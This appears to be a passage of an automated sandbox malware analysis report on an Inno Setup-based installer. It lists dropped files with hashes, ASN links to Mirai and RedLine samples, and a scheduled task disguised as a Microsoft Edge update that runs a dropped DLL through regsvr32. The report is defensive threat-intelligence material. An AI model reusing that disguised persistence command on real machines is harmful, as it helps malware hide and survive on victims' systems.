                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 52.149.20.212, 13.107.246.45
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            00:22:16Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3} path: regsvr32 s>/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
                                            19:22:08API Interceptor57x Sleep call for process: powershell.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKHilix.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 156.253.18.92
                                            hcxmivKYfL.exeGet hashmaliciousRedLineBrowse
                                            • 154.91.34.250
                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                            • 154.197.40.222
                                            ep0X2wemcU.exeGet hashmaliciousRedLineBrowse
                                            • 154.91.34.250
                                            vcimanagement.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.253.18.48
                                            vcimanagement.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.241.153.155
                                            db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                            • 156.236.109.76
                                            db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                            • 118.193.169.219
                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                            • 118.193.187.249
                                            b3astmode.spc.elfGet hashmaliciousMiraiBrowse
                                            • 118.188.166.158

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmpNkMMNoILv9.exeGet hashmaliciousUnknownBrowse
                                              MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                  MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                    ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                        qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                              Set-up.exeGet hashmaliciousLummaCBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):2156
                                                                Entropy (8bit):5.409696644034017
                                                                Encrypted:false
                                                                SSDEEP:48:1WSU4xympg4REoUP7gZ9tK8NPrjg7u1iMLgeRw4U2lY:1LHxveIjLZ2Kj8OLgipllY
                                                                MD5:34B7FA7083E2740AEADFE3E28DF334AF
                                                                SHA1:9395FB46AA7965316A9728BBA25B91627AA7A829
                                                                SHA-256:BA5BA0CCF9F2D0037BC29BAA7B1F9C9EF10F561AECD65C54A73B3868B1C71BD6
                                                                SHA-512:A422BCED1EBC70BCC6391E36031A3F7E87BE71D9C7F4A6818429D7172A38A9315BCE203CF327110922BC1F9BF7607A12DA5FCA6E25DB106CBF57F746298DDCF6
                                                                Malicious:false
                                                                Preview:@...e................................................@..........P................1]...E.....Y.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03uyovdk.glj.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_211rfoh2.2ko.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ajxmuk0.clq.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hb1ucjxk.aao.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnt2pvd0.5yr.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ib4p4fjj.1te.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3yj2mbk.pfj.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti4na4p3.3ju.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tosx40sc.2rg.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uy3eb0vs.4im.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtgqv1wj.3ya.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxfav3lk.q1y.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6144
                                                                Entropy (8bit):4.720366600008286
                                                                Encrypted:false
                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: NkMMNoILv9.exe, Detection: malicious, Browse
                                                                • Filename: MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip, Detection: malicious, Browse
                                                                • Filename: MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip, Detection: malicious, Browse
                                                                • Filename: MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip, Detection: malicious, Browse
                                                                • Filename: ETVk1yP43q.exe, Detection: malicious, Browse
                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                • Filename: setup.exe, Detection: malicious, Browse
                                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6144
                                                                Entropy (8bit):4.720366600008286
                                                                Encrypted:false
                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3284992
                                                                Entropy (8bit):6.5784760316942625
                                                                Encrypted:false
                                                                SSDEEP:49152:1dJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uJ:rJYVM+LtVt3P/KuG2ONG9iqLRQk333K
                                                                MD5:E97363B64F37EE24CDD55CEA14D1C564
                                                                SHA1:DD82AE5EBF33348011B0437FE8107D4D72B9E2B9
                                                                SHA-256:ADE1473799360F3DF1CB0F8F20FA99E325009FB53E151236D0A2BE6F041A8C8C
                                                                SHA-512:362BDF700DDD9186E9207351F0B8879F303C8C669B4BEA2327BA549E18F7A333E11F4DC07CC2721AC18FDCDEE04A8362AE6B4CDBDC961D220E154FA6DE32182B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................

                                                                C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3284992
                                                                Entropy (8bit):6.5784760316942625
                                                                Encrypted:false
                                                                SSDEEP:49152:1dJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uJ:rJYVM+LtVt3P/KuG2ONG9iqLRQk333K
                                                                MD5:E97363B64F37EE24CDD55CEA14D1C564
                                                                SHA1:DD82AE5EBF33348011B0437FE8107D4D72B9E2B9
                                                                SHA-256:ADE1473799360F3DF1CB0F8F20FA99E325009FB53E151236D0A2BE6F041A8C8C
                                                                SHA-512:362BDF700DDD9186E9207351F0B8879F303C8C669B4BEA2327BA549E18F7A333E11F4DC07CC2721AC18FDCDEE04A8362AE6B4CDBDC961D220E154FA6DE32182B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................

                                                                C:\Users\user\AppData\Local\is-L5KBT.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3309117
                                                                Entropy (8bit):6.5650700822104096
                                                                Encrypted:false
                                                                SSDEEP:49152:NdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uj:DJYVM+LtVt3P/KuG2ONG9iqLRQk333S
                                                                MD5:5D9A0600D9A9728C4C41944EB994F931
                                                                SHA1:8DB0AD9A425FFA7CEA886A6110B364C4FA0E2E08
                                                                SHA-256:B3A92750D5A4032CE32B4B6EB2D2E5FABDB36A7F27698D491F5E4D5071509D18
                                                                SHA-512:E1B4774334B7A62506A233B996FE5029348467ADAAFBCF59652FB3A04B2580DB3D45D4547C7D3123E5CE85B5FEC747A160230D1DDE9759553E921FF2C60BDC8B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................

                                                                C:\Users\user\AppData\Local\unins000.dat

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:InnoSetup Log File, version 0x418, 3989 bytes, 980108\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
                                                                Category:dropped
                                                                Size (bytes):3989
                                                                Entropy (8bit):3.8031833444898466
                                                                Encrypted:false
                                                                SSDEEP:96:40n1f4Joffs0CVbcuJlEDA4MZAe2LdtHh/:v1PfURbP4DSmbHZ
                                                                MD5:A0A4F062D82635A4F1E407C5E16269EE
                                                                SHA1:7A2AD49A0E472BD2CA3AABFA3D0D94A518649C5F
                                                                SHA-256:27728A99DA7EAEC31C46588F8B1C5019B4BEC03FCF54973244BD089826638BD6
                                                                SHA-512:CE31168BD79AD785677AD2F2370174118CD2251E449A6F78573AD6FAB175A8B1201EDB7559C65BE17944D5D7FA2686AD72BEA67EA65E2C1BB009C51F2124F781
                                                                Malicious:false
                                                                Preview:Inno Setup Uninstall Log (b)....................................File............................................................................................................................File........................................................................................................................................!...............................................................................................................C......6....".......s........9.8.0.1.0.8......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l..................;.... ..............IFPS...."........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCu

                                                                C:\Users\user\AppData\Local\unins000.exe (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3309117
                                                                Entropy (8bit):6.5650700822104096
                                                                Encrypted:false
                                                                SSDEEP:49152:NdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uj:DJYVM+LtVt3P/KuG2ONG9iqLRQk333S
                                                                MD5:5D9A0600D9A9728C4C41944EB994F931
                                                                SHA1:8DB0AD9A425FFA7CEA886A6110B364C4FA0E2E08
                                                                SHA-256:B3A92750D5A4032CE32B4B6EB2D2E5FABDB36A7F27698D491F5E4D5071509D18
                                                                SHA-512:E1B4774334B7A62506A233B996FE5029348467ADAAFBCF59652FB3A04B2580DB3D45D4547C7D3123E5CE85B5FEC747A160230D1DDE9759553E921FF2C60BDC8B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................

                                                                C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2491219
                                                                Entropy (8bit):6.77069137489322
                                                                Encrypted:false
                                                                SSDEEP:49152:hYXn5erYk9ytmHjj4Kcz8t8yqHYZib5g1IdvkQaXXP8Z0yywVJVjyEtUy:hYXIrYrsjjn9I+ib5V0y/cEtUy
                                                                MD5:72EA5220644A482BF6EE570CB9BD996C
                                                                SHA1:C5E6C482C975CA2A3CE7CFDE9A44A2BD18E69D81
